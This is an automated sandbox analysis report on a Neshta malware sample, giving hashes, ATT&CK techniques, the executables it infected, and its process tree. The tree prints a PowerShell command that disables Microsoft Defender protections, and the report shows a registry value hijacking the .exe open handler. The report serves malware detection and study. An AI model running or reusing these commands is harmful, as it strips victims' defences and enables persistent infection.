neshta | 7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe

Analysis

max time kernel
149s
max time network
145s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12-11-2024 23:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
Size

167KB
MD5

c5c88617be5b089f745657cb7aef8781
SHA1

ec213937afe072a790d74916c3ee9b7592cefcd2
SHA256

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe
SHA512

1d414cf9e9beff5b2e843ca578690cf921163808a65765d6ae1ef809bb1555519a530a7b4f1f5e177c50956dd1bafc87eba72449781c7203be6ffd202f54d354
SSDEEP

3072:sr85Cisqsb5Uh28vAbTV1WW69B9VjMdxPedN9ug0z9TBfFSPo/8/25jvDSs:k9izsb5Uh28+V1WW69B9VjMdxPedN9uJ

Score

10^/10

neshta discovery execution persistence spyware stealer

Malware Config

Signatures

Detect Neshta payload 5 IoCs

Processes:

resource	yara_rule
C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	family_neshta
behavioral2/memory/1900-246-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1900-808-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1900-842-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta
behavioral2/memory/1900-844-0x0000000000400000-0x000000000041B000-memory.dmp	family_neshta

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Neshta family
neshta
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

16 3864 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

5076 powershell.exe
3864 powershell.exe
3864 powershell.exe
2412 powershell.exe
2412 powershell.exe

flow	pid	process
16	3864	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Executes dropped EXE 1 IoCs

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

pid process

224 7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

pid	process
224	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops file in Program Files directory 64 IoCs

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~2.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{63880~1\WINDOW~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WI8A19~1\ImagingDevices.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MIA062~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpconfig.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Browser\WCCHRO~1\WCCHRO~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wab.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~3.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MID1AD~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jaureg.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOF5E2~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\msedge.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\FULLTR~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~2.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmpshare.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~4.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MI9C33~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\PWAHEL~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\INSTAL~1\setup.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GOOGLE~3.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.371\GO664E~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13147~1.37\MICROS~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\IDENTI~1.EXE	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Drops file in Windows directory 1 IoCs

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description ioc process

File opened for modification C:\Windows\svchost.com 7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\svchost.com	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5068 timeout.exe

pid	process
5068	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133759293695821379"	chrome.exe

Modifies registry class 1 IoCs

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

Processes:

powershell.exepowershell.exepowershell.exechrome.exechrome.exe

pid	process
5076	powershell.exe
5076	powershell.exe
3864	powershell.exe
2412	powershell.exe
2412	powershell.exe
3864	powershell.exe
4964	chrome.exe
4964	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe
3148	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

Processes:

chrome.exe

pid	process
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exechrome.exe

description	pid	process
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe
Token: SeCreatePagefilePrivilege	4964	chrome.exe
Token: SeShutdownPrivilege	4964	chrome.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

chrome.exe

pid process

4964 chrome.exe
4964 chrome.exe
4964 chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.execmd.exechrome.exe

description	pid	process	target process
PID 1900 wrote to memory of 224	1900	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
PID 1900 wrote to memory of 224	1900	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
PID 224 wrote to memory of 2996	224	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe	cmd.exe
PID 224 wrote to memory of 2996	224	7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe	cmd.exe
PID 2996 wrote to memory of 5076	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 5076	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 5068	2996	cmd.exe	timeout.exe
PID 2996 wrote to memory of 5068	2996	cmd.exe	timeout.exe
PID 2996 wrote to memory of 4964	2996	cmd.exe	chrome.exe
PID 2996 wrote to memory of 4964	2996	cmd.exe	chrome.exe
PID 2996 wrote to memory of 3864	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 3864	2996	cmd.exe	powershell.exe
PID 4964 wrote to memory of 4864	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 4864	4964	chrome.exe	chrome.exe
PID 2996 wrote to memory of 2412	2996	cmd.exe	powershell.exe
PID 2996 wrote to memory of 2412	2996	cmd.exe	powershell.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 2364	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 3344	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 3344	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe
PID 4964 wrote to memory of 1600	4964	chrome.exe	chrome.exe

C:\Users\Admin\AppData\Local\Temp\7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
"C:\Users\Admin\AppData\Local\Temp\7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe"
1⤵
- Checks computer location settings
- Modifies system executable filetype association
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Users\Admin\AppData\Local\Temp\3582-490\7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe
  "C:\Users\Admin\AppData\Local\Temp\3582-490\7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:224
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\A364.tmp\A365.tmp\A366.bat C:\Users\Admin\AppData\Local\Temp\3582-490\7d5e1f4288f6d623823225850256f5d01f40347d6cf326ebf80ee6ade39308fe.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableScriptScanning $true; Set-MpPreference -DisableBehaviorMonitoring $true; Set-MpPreference -DisableIOAVProtection $true; Set-MpPreference -DisableIntrusionPreventionSystem $true"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5076
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5068
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Profile1" "https://row4.vfsglobal.com/NetherlandsAppointment/Account/RegisteredLogin?q=shSA0YnE4pLF9Xzwon/x/GAZMwphNakm2hstnNbT9MeeIMxQ284VVU8CmQHTuVDj6RdcTCMqElpit5BM4ux0VArDQlqpHKaTeK/989SLnVo2oENZEElKwBFwHcWrSC0YiWJJHwotdTEZqGBNQRSz/BawTiiRBsPiJQLiMdEl/eM//hmJZXJzZCOL8mdsFp1J"
      4⤵
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:4964
